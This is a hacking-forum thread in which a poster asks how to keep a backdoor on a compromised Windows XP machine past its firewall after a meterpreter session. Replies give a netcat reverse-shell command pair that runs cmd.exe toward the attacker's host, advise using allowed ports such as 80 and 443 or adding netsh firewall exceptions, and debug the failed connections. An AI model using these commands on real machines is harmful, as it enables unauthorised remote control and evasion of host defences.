Jump to content

Evade Firewall On Compromised Machine.


c0r
 Share

Recommended Posts

I'm trying to create a backdoor on a virtual xp sp2 machine firewall enabled.

I managed to get a meterpreter session on the machine.

I tried to install metsvc but it fails to bind.

Also i tried to install netcat and open a port using netsh command in windows.

But the port doesnt open.

Any other ideas?

c

ps:this is all practised in my virtual lab.

Edited by c0r
Link to comment
Share on other sites

Hi C0R,

In order to create a reverse shell with NetCat you will need to do the following:

On your host, you have to listen for an incoming connection (thanks to -v, you'll get a quick note as soon as the shell connects):

netcat -v -l -p 3333

On the remote host, the following command has to be executed in order to establish a connection to your host:

netcat -e cmd.exe yourhost 3333

Try the above, if doesn't work let me know.

Regards,

Infiltrator

Link to comment
Share on other sites

Are you trying port 455 (the one that tutorial you posted used as an example) or some other port?

My first instinct is that the Win firewall is blocking any unused port by default. So you could either try to get your netcat backdoor to work over an allowed port (like 80, 8080, 443, etc.) or put a rule into the firewall to explicitly allow incoming/outgoing traffic on the port of your choice.

I have the openBSD version of netcat (which is now the default version that Ubuntu comes with) and it won't let you use any of the first 1024 ports without root access. Not sure if the Win version is the same or not.

Edited by chikpee
Link to comment
Share on other sites

I tried this howto Persistent netcat backdoor

but the firewall doenst allow the connection!

c

That's kind of interesting, cause when I created a reverse shell with netcat on my VMs. I was able to get a reverse shell, even with the firewall turned on.

May be you should try using the TCP ports mentioned (80, 443)

Link to comment
Share on other sites

I'm trying to create a backdoor on a virtual xp sp2 machine firewall enabled.

I managed to get a meterpreter session on the machine.

I tried to install metsvc but it fails to bind.

Also i tried to install netcat and open a port using netsh command in windows.

But the port doesnt open.

Any other ideas?

c

ps:this is all practised in my virtual lab.

Use netsh from cli. A quick google produced:

http://www.windowsnetworking.com/articles_...s-Firewall.html

Link to comment
Share on other sites

None...that's the wierd part...

I'm trying it out on a new installed xp sp2 now.

Oke...i'm trying this on a fresh xp sp2 version.

I don't get any errors,the firewall adds the exceptions without any problem.

But when i try to connect with netcat to port 139 it times out.

nc -v 192.168.1.102 139

192.168.1.102: inverse host lookup failed: Unknown server error : Connection timed out

(UNKNOWN) [192.168.1.102] 139 (netbios-ssn) open

In the windows machine i see the connection

TCP 192.168.1.102:139 192.168.1.106:44169 ESTABLISHED

for a short time...times out.

any ideas?

c

Edited by c0r
Link to comment
Share on other sites

None...that's the wierd part...

I'm trying it out on a new installed xp sp2 now.

Oke...i'm trying this on a fresh xp sp2 version.

I don't get any errors,the firewall adds the exceptions without any problem.

But when i try to connect with netcat to port 139 it times out.

nc -v 192.168.1.102 139

192.168.1.102: inverse host lookup failed: Unknown server error : Connection timed out

(UNKNOWN) [192.168.1.102] 139 (netbios-ssn) open

In the windows machine i see the connection

TCP 192.168.1.102:139 192.168.1.106:44169 ESTABLISHED

for a short time...times out.

any ideas?

c

What you need to ensure, is that you have one shell listening for incoming connections and the other shell making the outbound connection.

So on the computer that, you wish to turn off the monitor. It should be making connection out. And on the computer, where you are going to remotely control it, have it set to listen.

If else fails, watch this video

Edited by Infiltrator
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...